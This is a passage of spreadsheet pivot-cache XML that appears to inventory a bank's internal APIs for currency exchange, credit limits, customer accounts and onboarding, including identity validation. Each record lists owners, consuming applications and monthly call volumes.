    <s v="La API credit disbursement - management permitire que desde el proyecto Pyme se pueda saber la notificacion de desembolso de un credito desde Bizagui."/>
    <s v="CANALES_Y_CONTENIDOS_DIGITALES_PYMES"/>
    <s v="Canales Pymes"/>
    <x v="23"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-02-02T14:39:40"/>
    <s v="Credit Limit"/>
    <n v="101"/>
    <s v="Credit Limit - Credit Limits Management"/>
    <n v="101"/>
    <x v="96"/>
    <s v="Esta API cuenta con capacidades que permite la creación de lí­mites de endeudamiento"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Experiencia de Cartera"/>
    <m/>
    <m/>
    <m/>
    <s v="PROFIN_PRODUCTORCONSUMIDOR _x000d__x000a_ LoansOffer_NU0102001"/>
    <n v="25"/>
    <n v="7"/>
    <n v="1"/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-07-28T16:05:49"/>
    <s v="Currency Exchange"/>
    <n v="120"/>
    <s v="Currency Exchange - Estimate Transactions"/>
    <n v="120"/>
    <x v="97"/>
    <s v="No tiene Descipcion"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Financiasion"/>
    <m/>
    <s v="CalcularOperacionDivisas/V1.0"/>
    <m/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR"/>
    <n v="15067"/>
    <n v="13821"/>
    <n v="12778"/>
    <n v="12994"/>
    <n v="13343"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-07-28T16:05:49"/>
    <s v="Currency Exchange"/>
    <n v="120"/>
    <s v="Currency Exchange - Exchange Numerals"/>
    <n v="100"/>
    <x v="98"/>
    <s v="El API Currency Exchange - Exchange Numerales permitirá realizar la consulta de los numerales cambiarios a partir de la identificación del cliente, con el tipo de persona y transacción."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Captaciones"/>
    <m/>
    <s v="consultaNumeralCambiario/V1.0"/>
    <m/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR"/>
    <n v="15064"/>
    <n v="13821"/>
    <n v="12772"/>
    <n v="12993"/>
    <n v="13357"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-07-28T16:05:49"/>
    <s v="Currency Exchange"/>
    <n v="120"/>
    <s v="Currency Exchange - Negociated Rates"/>
    <n v="100"/>
    <x v="99"/>
    <s v="El API Currency Exchange Negociated Rates permitirá la consulta de las tasas negociadas que están disponibles para realizar transacciones de compra y venta de divisas"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Captaciones"/>
    <m/>
    <s v="GestionTasaPactada/V1.0"/>
    <m/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR"/>
    <n v="15066"/>
    <n v="13811"/>
    <n v="12793"/>
    <n v="12984"/>
    <n v="13372"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-05-25T17:50:55"/>
    <s v="Currency Exchange"/>
    <n v="120"/>
    <s v="Currency Exchange - Orders"/>
    <n v="100"/>
    <x v="100"/>
    <s v="No tiene Descipcion"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Captaciones"/>
    <m/>
    <s v="GestionOrdenes/V1.0"/>
    <m/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR"/>
    <n v="15062"/>
    <n v="13823"/>
    <n v="12776"/>
    <n v="12982"/>
    <n v="13376"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-10-27T10:02:05"/>
    <s v="Currency Exchange"/>
    <n v="113"/>
    <s v="Currency Exchange - Rates"/>
    <n v="103"/>
    <x v="101"/>
    <s v="La Api de Currency Exchange - rates tiene como objetivo consultar el valor de la tasa de cambio entre dos tipos de moneda."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="ConsultaTasa/V1.0"/>
    <m/>
    <s v="TMP1 johucorr_AW1185001 _x000d__x000a_ TMP2 johucorr_AW1185001 _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ App inversionesGB_AW1185001 _x000d__x000a_ APOLO_AW0360010"/>
    <n v="291"/>
    <n v="237"/>
    <m/>
    <m/>
    <m/>
    <s v="API Pro FE"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-07-28T16:05:49"/>
    <s v="Currency Exchange"/>
    <n v="120"/>
    <s v="Currency Exchange - Transactions"/>
    <n v="120"/>
    <x v="102"/>
    <s v="No tiene Descipcion"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR"/>
    <n v="15066"/>
    <n v="13821"/>
    <n v="12769"/>
    <n v="12984"/>
    <n v="13338"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-06-23T17:04:12"/>
    <s v="Currency Exchange"/>
    <n v="113"/>
    <s v="Currency Exchange - Transfer Rates"/>
    <n v="112"/>
    <x v="103"/>
    <s v="La Api de Currency Exchange  Transfer Rates tiene como objetivo exponer la información de las comisiones y tasas preferenciales del cliente cuando se realiza una transferencia internacional."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="GestionComisionTransferenciasExternas/V1.0, _x000a_ConsultaTasaPreferencialCliente/V1.0"/>
    <m/>
    <s v="TMP1 johucorr_AW1185001 _x000d__x000a_ TMP2 johucorr_AW1185001 _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ App inversionesGB_AW1185001 _x000d__x000a_ APOLO_AW0360010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API Pro FE"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-04-12T08:47:49"/>
    <s v="Currency Exchange Reasons"/>
    <n v="100"/>
    <s v="Currency Exchange Reasons - Transaction Reasons"/>
    <n v="100"/>
    <x v="104"/>
    <s v="La API Permite consultar los posibles motivos de la transacción para operaciones de enví­o y recepción de divisas. "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Captaciones"/>
    <m/>
    <m/>
    <m/>
    <s v="APIC_PRODUCTORCONSUMIDOR"/>
    <m/>
    <n v="6"/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-03-10T14:01:35"/>
    <s v="Customer Validation"/>
    <n v="203"/>
    <s v="Customer - Check Control List"/>
    <n v="203"/>
    <x v="105"/>
    <s v="API que permite listar los detalles de un cliente en Listas de Control."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <x v="3"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <s v="ConsultaListasDeControl/V1.0"/>
    <m/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ HabitatCore_AW1281003 _x000d__x000a_ GestionaNegocios_AW1302001 _x000d__x000a_ EDPYME_AW1170 _x000d__x000a_ VinculacionAperturaProductoDigital_AW1128 _x000d__x000a_ VinculacionAperturaProductoDigitalSucursales_AW1177 _x000d__x000a_ BIZTRACK_AW0998 _x000d__x000a_ APM_AW1097001 _x000d__x000a_ APPVinculation_AW1315014 _x000d__x000a_ Networking_NU0046001 _x000d__x000a_ SEG_NU0064001 _x000d__x000a_ PLINK_AW1206001 _x000d__x000a_ Horus_AW1258011 _x000d__x000a_ NETWORKING_NU0046001 _x000d__x000a_ VINCUTRANS_NU0034001 _x000d__x000a_ ECORIESGOS_AW1081001 _x000d__x000a_ GestionVendor_AW0661003 _x000d__x000a_ AdaptadorMarketplace_NU0143001 _x000d__x000a_ RIGO_NU0135001 _x000d__x000a_ APIC_AW1176 _x000d__x000a_ AdquirenciaCargaMasiva_NU0142001 _x000d__x000a_ Plink_AW1206001 _x000d__x000a_ AccountOpening_AW1480001 _x000d__x000a_ PLINK_AW1206001 _x000d__x000a_ BIZAGIBEG_AW1176001 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ OYD_AW0629001 _x000d__x000a_ ALM_AW0955001"/>
    <n v="639145"/>
    <n v="506982"/>
    <n v="486266"/>
    <n v="561137"/>
    <n v="689546"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-08-05T11:41:29"/>
    <s v="Customer - Manage Prospect"/>
    <n v="101"/>
    <s v="Customer - Manage Prospect Natural Person"/>
    <n v="101"/>
    <x v="106"/>
    <s v="La Api ofrece a los consumidores, la capacidad de crear y modificar clientes como personas naturales en SAP CRM."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="GestionarProspecto/V2.0"/>
    <s v="SAP CRM_AW0682001"/>
    <s v="NEQUICLIENTES_AW1011 _x000d__x000a_ BCHerramientasMonitoreoPrd2"/>
    <n v="26258"/>
    <n v="18066"/>
    <n v="117011"/>
    <n v="183486"/>
    <n v="177912"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-09-06T14:49:44"/>
    <s v="Customer Manage Prospect"/>
    <n v="101"/>
    <s v="Customer - Manage Prospect Natural Person"/>
    <n v="101"/>
    <x v="106"/>
    <s v="La Api ofrece a los consumidores, la capacidad de crear y modificar clientes como personas naturales en SAP CRM."/>
    <s v="CLIENTES"/>
    <s v="Transversales Clientes"/>
    <x v="5"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="John Jairo Gaviria Escobar"/>
    <s v="GestionarProspecto/V2.0"/>
    <m/>
    <s v="VINCUTRANS_NU0034001 _x000d__x000a_ APP-PERSONAS_NU0146001 _x000d__x000a_ SVPSucursalVirtualPersonas_NU0149001"/>
    <m/>
    <m/>
    <m/>
    <n v="2"/>
    <n v="2"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-04-11T15:37:14"/>
    <s v="CustomerProducts"/>
    <n v="110"/>
    <s v="Customer - Products"/>
    <n v="110"/>
    <x v="107"/>
    <s v="Permitir consultar la información de productos asociados a un cliente"/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <s v="RecuperarProducto/V1.0"/>
    <m/>
    <s v="TMP EDIN APP_AW1276001 _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ Cayman_Soporte _x000d__x000a_ APOLO_AW0360010 _x000d__x000a_ App inversionesGB_AW1185001"/>
    <n v="56452"/>
    <n v="55858"/>
    <m/>
    <m/>
    <m/>
    <s v="API Pro FE"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-04-26T10:55:21"/>
    <s v="Customer Accounts"/>
    <n v="113"/>
    <s v="Customer Accounts - Accounts"/>
    <n v="113"/>
    <x v="108"/>
    <s v="Permite conocer la información básica y detallada de las cuentas de ahorro o corrientes de un cliente Bancolombia."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <m/>
    <m/>
    <s v="CGC_NU0014001 _x000d__x000a_ EDPYME_AW1170 _x000d__x000a_ PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000d__x000a_ Valores_AW1373 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ LimitsCreditExhibition_NU0114001 _x000d__x000a_ SEG_NU0064001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ Horus_AW1258011 _x000d__x000a_ JornadaPagos_AW1316001 _x000d__x000a_ Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ Boton de Transferencias_AW1277001 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ PODEM01_NU0001 _x000d__x000a_ APIC_AW1176 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Cuentas_Bancolombia_AW1081001_SUFI_APM _x000d__x000a_ BancolombiaPay_AW1435001 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ prueba _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ APP_PRUEBA _x000d__x000a_ APP-PERSONAS_NU0146001 _x000d__x000a_ ModuloSVELeasing_AW0360006 _x000d__x000a_ JornadaDepositos_AW1177001 _x000d__x000a_ ms_bs_customer_account_NU0163001"/>
    <n v="93076"/>
    <n v="154858"/>
    <n v="42180102"/>
    <n v="41278649"/>
    <n v="50537375"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-04-26T10:55:21"/>
    <s v="Customer Accounts"/>
    <n v="113"/>
    <s v="Customer Accounts - Balances"/>
    <n v="113"/>
    <x v="109"/>
    <s v="Permite realizar las consultas de saldos de una cuenta de depósito, se puede consultar por cuenta o por todas las cuentas de un cliente en particular."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <m/>
    <m/>
    <s v="CGC_NU0014001 _x000d__x000a_ EDPYME_AW1170 _x000d__x000a_ PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000d__x000a_ Valores_AW1373 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ LimitsCreditExhibition_NU0114001 _x000d__x000a_ SEG_NU0064001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ Horus_AW1258011 _x000d__x000a_ JornadaPagos_AW1316001 _x000d__x000a_ Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ Boton de Transferencias_AW1277001 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ PODEM01_NU0001 _x000d__x000a_ APIC_AW1176 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Cuentas_Bancolombia_AW1081001_SUFI_APM _x000d__x000a_ BancolombiaPay_AW1435001 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ prueba _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ APP_PRUEBA _x000d__x000a_ APP-PERSONAS_NU0146001 _x000d__x000a_ ModuloSVELeasing_AW0360006 _x000d__x000a_ JornadaDepositos_AW1177001 _x000d__x000a_ ms_bs_customer_account_NU0163001"/>
    <n v="2692855"/>
    <n v="2555186"/>
    <n v="2555180"/>
    <n v="2680531"/>
    <n v="3143115"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-11-04T11:00:23"/>
    <s v="Customer Acquisition"/>
    <n v="110"/>
    <s v="Customer Acquisition  Notification"/>
    <n v="110"/>
    <x v="110"/>
    <s v="## **Descripción:** La API Customer Acquisition Notification agrupa todas las capacidades de notificación requeridas en los procesos de Conocimiento del Cliente. Una notificación corresponde a cualquier información asociada al proceso y que el negocio desea que el potencial cliente conozca, por ejemplo: un correo de bienvenida,  un formato o documento, etc.  Las notificaciones pueden ser enviadas ví­a correo electrónico o sms dependiendo de su naturaleza, a medida que se vayan habilitando en la API.  ## **Operaciones**  ###### **Enviar Formato:** Esta operación habilita el enví­o de notificación ví­a correo electrónico al potencial cliente, indicando la finalización exitosa de la vinculación del cliente y adjuntando el Formato de Conocimiento del Cliente. Recibe un set de parámetros que permiten identificar el escenario de vinculación para el cual se desea enviar la notificación y el tipo de notificación que aplica. Premisas de Enviar Formato:  - Se valida la existencia de un correo electrónico registrado en el sistema.  - La operación habilita la captura de un correo electrónico como dato opcional, pero tiene prioridad el registrado previamente en el sistema para la validación del cliente.  - Para el consumo exitoso de esta operación es necesario que se hayan completado las operaciones prerrequisito definidas para el escenario de vinculación."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor"/>
    <s v="Vinculación y actualización"/>
    <s v="Luisa Carolina Jimenez Jimenez"/>
    <m/>
    <m/>
    <s v="VINCUTRANS_NU0034001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-08-26T15:15:02"/>
    <s v="Customer Acquisition Data"/>
    <n v="100"/>
    <s v="Customer Acquisition - Persistence"/>
    <n v="100"/>
    <x v="111"/>
    <s v="## **Descripción:** La API Customer Acquisition Persistence habilita las capacidades para registrar la  vinculación finalizada en los maestros de clientes, garantizando la completitud de todas las actividades exigidas por los procesos de conocimiento del cliente. Además, incluye funcionalidades para custodiar los documentos soporte de los procesos de conocimiento del cliente cumpliendo así­ las exigencias normativas. ## **Operaciones**  ###### **Persistir Datos Cliente** Permite dejar en firme la vinculación en los maestro de clientes, modificando el estado de la vinculación en SAP CRM a finalizada, haciendo uso del servicio Gestionar Prospectos. Para habilitar esta capacidad es necesario ejecutar previamente la segmentación y calificalificación del potencial cliente y  además garantizar la firma electrónica del formato F-2486 Conocimiento PN_VinculacioÌ?n Transversal generado en el proceso con la información capturada a través de la API Information NP. ###### **Persistir documentos del Cliente** A través de esta capacidad se realiza la custodia en Oracle de los documentos soporte cargados por el potencial cliente requeridos en la experiencia; esta custodia se efectíºa  haciendo uso del servicio de TDC. Premisas de Persistir Documentos del Cliente: - Para los escenarios del proceso de vinculación esta es la ultima operación a consumir para garantizar la finalización de la solicitud y dar cumplimiento a la norma. - En algunos casos la operación entrega una respuesta de rechazo pero indica que se puede continuar con las gestiones del producto, enviando los documentos a custodiar a través de un proceso de reintentos por lotes. - Este proceso de custodia aplica para documentos que no requieren firma."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor"/>
    <s v="Vinculación y actualización"/>
    <s v="Luisa Carolina Jimenez Jimenez"/>
    <m/>
    <m/>
    <s v="VINCUTRANS_NU0034001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-10-05T09:31:07"/>
    <s v="CustomerAcquisitionDocs"/>
    <n v="101"/>
    <s v="Customer Acquisition Documents Digitalization"/>
    <n v="101"/>
    <x v="112"/>
    <s v="## **Descripción:** Es la API que habilita las capacidades para el cargue y procesamiento de documentos soporte de los proceso de conocimiento del cliente. Lo anterior con el objetivo de extraer su data lí­quida (cuando aplique) o simplemente almacenar aquellos documentos digitalizados que se convierten en soportes del potencial cliente, por ejemplo, documento de identidad, carta laboral, etc. Estos documentos se persistirán en el repositorio oficial del Banco a través de la API Customer Acquisition Persistence, solo si el proceso se finaliza satisfactoriamente, de lo contrario serán desechados. Esta API contempla capacidades que permiten el procesamiento de los documentos de forma sí­ncrona o así­ncrona de acuerdo a los escenarios de conocimiento del cliente a habilitar. Posteriormente, en esta API se incorporará  el cargue y/o procesamiento de documentos adicionales para la vinculación y/o actualización de personas naturales y jurí­dicas. Premisas de la API Customer Acquisition Digitalization: * Solo está habilitado el cargue y procesamiento de documentos en formato .pdf, .jpg, .jpeg, .tif, .tiff o .png. * Se debe garantizar que el tamaí±o de los archivos a cargar no superen el lí­mite máximo permitido, el cual está inicialmente parametrizado en 4 MB. Posteriormente éste se pretende ampliar a 10 MB. * Cuando se requiera procesar documentos de forma así­ncrona, se debe efectuar el cargue a través de la operación cargar documentos, indicando que no se esperará el resultado del procesamiento, éste se debe consultar a través de la operación validar datos extraí­dos. ## **Operaciones**  ###### **Cargar documentos:** A través de esta operación es posible cargar el documento de identidad  y los documentos soporte del proceso de vinculación de los potenciales clientes, inicialmente solo se tendrá habilitado el cargue de cédula de ciudadaní­a y el registro íºnico tributario (RUT) como documento soporte adicional. Lo anterior es posible a través de la herramienta Kofax consumiendo la API Document Management - Digitalization_v1.0.0 Premisas de Cargar documentos: * Permite extraer, a través del procesamiento del documento de identidad, los datos requeridos para ejecutar la etapa 1 de la validación de identidad (comparación de datos de identidad - Reconocer) * Tiene parametrizado un níºmero máximo de reintentos para cada subtipo documental, una vez se superan se cancela la solicitud. * Esta capacidad habilita el diligenciamiento manual de algunos campos presentes en la cédula de ciudadaní­a cuando Kofax realiza un procesamiento parcial del documento. * Los datos extraí­dos se almacenan como parte de los datos personales del cliente y no se permite su edición posteriormente. * Permite extraer información del RUT para verificar la actividad económica de algunas ocupaciones parametrizadas en el componente. * Habilita para el consumidor la posibilidad de indicar a través de variables de entrada si el subtipo documental requiere solo carga o carga mas procesamiento,  asimismo permite indicar si el procesamiento es sí­ncrono o así­ncrono. ###### **Validar datos extraidos:** A través de esta operación es posible consultar el resultado del procesamiento de los documentos cargados en la operación cargar documentos, siempre y cuando se haya indicando en el cargue la ejecución de proceso de manera así­ncrona.  Premisas de Validar Datos Extraí­dos: * La respuesta de esta operación es la misma que se entrega al consumidor en Cargar Documentos, se diferencias en tiempo de procesamiento. * En los escenarios de vinculación parametrizados inicialmente en el componente, no se contempla el uso de esta operación, dado que el procesamiento del documento de identidad y del RUT es prerrequisito de las actividades predecesoras de esta validación. Se debe asegurar revisión funcional previo a parametrizarla en un escenario de vinculación."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor"/>
    <s v="Vinculación y actualización"/>
    <s v="Luisa Carolina Jimenez Jimenez"/>
    <m/>
    <m/>
    <s v="VINCUTRANS_NU0034001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-08-26T14:51:25"/>
    <s v="Customer Acquisition Security"/>
    <n v="100"/>
    <s v="Customer Acquisition Identity"/>
    <n v="100"/>
    <x v="113"/>
    <s v="## **Descripción:** La API Customer Acquisition Identity habilita las capacidades para validar la identidad del potencial cliente, asegurando que quien adelanta el proceso es quien dice ser, lo anterior es posible a través de los siguientes mecanismos:  - Comparación de datos de identidad contra fuentes externas  - Generación y validación de preguntas reto A través del primer mecanismo, se comparan los datos suministrados por el potencial cliente en el Producto Customer Acquisition Data y los datos extraí­dos a partir del documento de identidad versus los datos del potencial cliente entregados por fuentes externas avaladas por el Banco. El segundo mecanismo, habilita un cuestionario de preguntas reto, soportadas en Información almacenada en las centrales de riesgo sobre el potencial cliente a validar. Inicialmente este mecanismo se soporta en el Servicio Evidente (API Customer Risk - Validate Identity). ## **Operaciones**  ###### **Validar Identidad Cliente** A través de esta operación es posible validar la identidad del potencial cliente o representante legal, comparando los datos del documento de identidad contra las fuentes de información externas avaladas por el Banco. Inicialmente se hará uso de Experian como fuente externa, a través del Servicio Reconocer, el cual corresponde a la primera etapa de la Operación Validar identidad del cliente. Este servicio consume la API Customer Profile Information - Private External Sources. Esta operación evalíºa la vigencia del documento de identidad reportado por la fuente externa y determina el puntaje obtenido en la comparación de los datos suministrados por el cliente versus los datos entregados por la fuente externa.  El puntaje de coincidencia es un valor que se compara contra los umbrales parametrizados dentro del componente y éstos pueden variar de acuerdo al escenario de vinculación y las necesidades del negocio. Para definir si la validación de identidad es exitosa se tienen en cuenta las siguientes premisas: Escenario 1: El puntaje de coincidencia está entre el umbral mí­nimo y máximo parametrizados, en este caso, se debe llevar a cabo la activación de preguntas reto. La operación entrega esta instrucción en la respuesta. Escenario 2: El puntaje de coincidencia está por encima del umbral máximo parametrizado, en este caso la validación de identidad es exitosa, el potencial cliente puede continuar el proceso de vinculación sin aplicar las operaciones de preguntas reto, el estado de éstas se marca como &quot;Completado Automáticamente&quot;. Escenario 3: El puntaje de coincidencia está por debajo del umbral mí­nimo parametrizado, en este caso la validación de identidad NO es exitosa, no se puede continuar con el proceso y se cancela la solicitud de vinculación. - Cuando el documento de identidad no está vigente de acuerdo a los datos entregados por la fuente externa, esta capacidad cancela la solicitud sin activar la comparación de datos. - Cuando la Operación &quot;Cargar documentos&quot; se encuentra en estado &quot;Diligenciar manualmente&quot;, es obligatorio el llamado a las operaciones de Preguntas reto. - Cuando el celular y/o correo electrónico no coincidan con la fuente externa Experian, es obligatorio el llamado a las operaciones de Preguntas reto. ###### **Exponer Preguntas Reto** Esta operación se activa de acuerdo al resultado de la operación Validar Identidad para asegurar la validación de identidad del potencial cliente. Así­ mismo, se activa:  - Cuando el puntaje de coincidencia está entre el umbral mí­nimo y máximo   - Cuando el potencial cliente no está registrado en Experian  - Cuando la información del documento de identidad debe diligenciarse manualmente  - Cuando el celular y/o correo electrónico no coinciden con los reportados en Experian  Premisas de la Operación Exponer Preguntas Reto: - La operación Exponer Preguntas Reto permite generar y presentar un cuestionario de 4 preguntas con 4 opciones de respuesta cada una, éstas son generadas de manera aleatoria basadas en el historial crediticio e información del potencial cliente registrada en las centrales de riesgo.  - El potencial cliente debe seleccionar la respuesta correcta dentro de un conjunto de opciones disponibles y  éstas se entregan para su validación a la operación Validar Preguntas Reto. - El Servicio de Experian cuenta con un níºmero máximo de intentos parametrizada para la generación de preguntas reto, por dí­a, mes y aí±o, cuando éste se supera, se cancela la solicitud de vinculación y se genera un bloqueo temporal sobre el potencial cliente, evitando que intente crear nuevas solicitudes a través del Componente. Lo anterior se realiza con el propósito de no generar gastos adicionales a raí­z de las consultas a Experian, teniendo en cuenta que el proveedor continuará enviando error por los intentos superados hasta que se cumpla el tiempo de bloqueo. ###### **Validar Preguntas Reto** A través de esta operación es posible validar la identidad del potencial cliente verificando la consistencia de las respuestas entregadas a las preguntas expuestas previamente en la operación Exponer Preguntas Reto y es Experian quien informa si se aprueba o no la validación de identidad."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor"/>
    <s v="Vinculación y actualización"/>
    <s v="Luisa Carolina Jimenez Jimenez"/>
    <m/>
    <m/>
    <s v="VINCUTRANS_NU0034001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-09-06T14:44:59"/>
    <s v="CustomerAcquisitionDocs"/>
    <n v="101"/>
    <s v="Customer Acquisition Images And Documents Management"/>
    <n v="100"/>
    <x v="114"/>
    <s v="## **Descripción:** Esta API habilita las capacidades para generar y exponer el formato de conocimiento del cliente en el proceso de vinculación. De igual forma, permite ejecutar la firma electrónica y custodia del formato previamente diligenciado con la información ingresada por el potencial cliente en la API Customer Acquisition Information PN. Antes de habilitar el llamado a esta API, se deben consumir las capacidades de la API Information PN. ## **Operaciones**  ###### **Generar y exponer documentos:** A través de esta operación es posible consolidar, en una plantilla .pdf del formato de conocimiento del cliente, la información recolectada mediante las operaciones de la API Customer Acquisition Information PN, como soporte del proceso de vinculación.  El formato se guarda temporalmente en el componente  y se genera una URL que lo expone al consumidor, ésta tiene un tiempo de vigencia de 5 minutos, pasado este tiempo la URL expira.   Esta operación genera 2 copias del formato de conocimiento del cliente, una versión encriptada que se comparte al cliente a ví­a correo electrónica y otra que se firma electrónicamente y se custodia en el repositorio oficial del Banco. Posteriormente, será posible incorporar nuevas plantillas para los escenarios de conocimiento del cliente que se vayan habilitando en el componente. ###### **Firmar y custodiar documentos:** A través de esta operación es posible firmar electrónicamente el formato de conocimiento del cliente generado en la experiencia de vinculación, este es el soporte jurí­dico del proceso.  Esta operación hace uso de la API Document Management - Digital Signature_v1.0.0 Premisas de la Operación Firmar y custodiar documento: * Se debe asegurar la ejecución exitosa de las operaciones prerrequisito, entre ellas, generar y validar token, generar y exponer documentos y las demás parametrizadas en el componente. * Asegura la generación del archivo de trazabilidad a adjuntar en el formato de conocimiento del cliente para garantizar las condiciones de no repudio.   * La API a reusar es responsable de asegurar la custodia del formato de conocimiento del cliente, 